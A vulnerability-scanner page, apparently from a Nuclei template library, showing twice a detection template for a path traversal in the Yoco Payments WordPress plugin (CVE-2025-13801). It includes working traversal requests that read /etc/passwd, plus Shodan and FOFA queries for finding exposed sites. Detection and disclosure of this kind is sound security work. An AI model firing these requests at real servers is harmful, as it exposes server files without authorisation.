Yoco Payments <= 3.8.8 - Path Traversal

CVE-2025-13801

Verified

Description

Yoco Payments WordPress plugin <= 3.8.8 contains a path traversal caused by improper validation of the file parameter, letting unauthenticated attackers read arbitrary files on the server.

Severity

High

CVSS Score

7.5

Published Date

April 23, 2026

Template Author

0x_akoko

CVE-2025-13801.yaml

id: CVE-2025-13801

info:
  name: Yoco Payments <= 3.8.8 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   Yoco Payments WordPress plugin <= 3.8.8 contains a path traversal caused by improper validation of the file parameter, letting unauthenticated attackers read arbitrary files on the server.
  impact: |
   Unauthenticated attackers can read sensitive files on the server, potentially exposing confidential information.
  remediation: |
   Update to the latest version beyond 3.8.8.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="yoco-payment-gateway"
    shodan-query: http.html:"yoco-payment-gateway"
  tags: wordpress,wp-plugin,yoco,lfi,path-traversal,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/yoco-payment-gateway/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "=== Yoco Payments ===", "Stable tag:")
          - compare_versions(plugin_version, '<= 3.8.8')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/yoco/logs?file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /?rest_route=/yoco/logs&file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - regex('root:[x*]?:0:0:', body)
        condition: and
# digest: 4a0a00473045022005c44ce1a56374026c3bbf615772e5ffb6e12021931bcc171a313875793b1302022100ebd22bb6d1d0bd71e58a53fa8d85892ad61b70453c737a85e66b6f7da1122019:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE ID:

cwe-22

References

Remediation Steps

Update to the latest version beyond 3.8.8.

id: CVE-2025-13801

info:
  name: Yoco Payments <= 3.8.8 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   Yoco Payments WordPress plugin <= 3.8.8 contains a path traversal caused by improper validation of the file parameter, letting unauthenticated attackers read arbitrary files on the server.
  impact: |
   Unauthenticated attackers can read sensitive files on the server, potentially exposing confidential information.
  remediation: |
   Update to the latest version beyond 3.8.8.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="yoco-payment-gateway"
    shodan-query: http.html:"yoco-payment-gateway"
  tags: wordpress,wp-plugin,yoco,lfi,path-traversal,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/yoco-payment-gateway/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "=== Yoco Payments ===", "Stable tag:")
          - compare_versions(plugin_version, '<= 3.8.8')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: plugin_version
        part: body
        group: 1
        regex:
          - '(?m)Stable tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-json/yoco/logs?file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /?rest_route=/yoco/logs&file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - regex('root:[x*]?:0:0:', body)
        condition: and
# digest: 4a0a00473045022005c44ce1a56374026c3bbf615772e5ffb6e12021931bcc171a313875793b1302022100ebd22bb6d1d0bd71e58a53fa8d85892ad61b70453c737a85e66b6f7da1122019:922c64590222798bb761d5b6d8e72950

Yoco Payments <= 3.8.8 - Path Traversal

Description

Severity

CVSS Score

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Yoco Payments <= 3.8.8 - Path Traversal

Description

Severity

CVSS Score

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps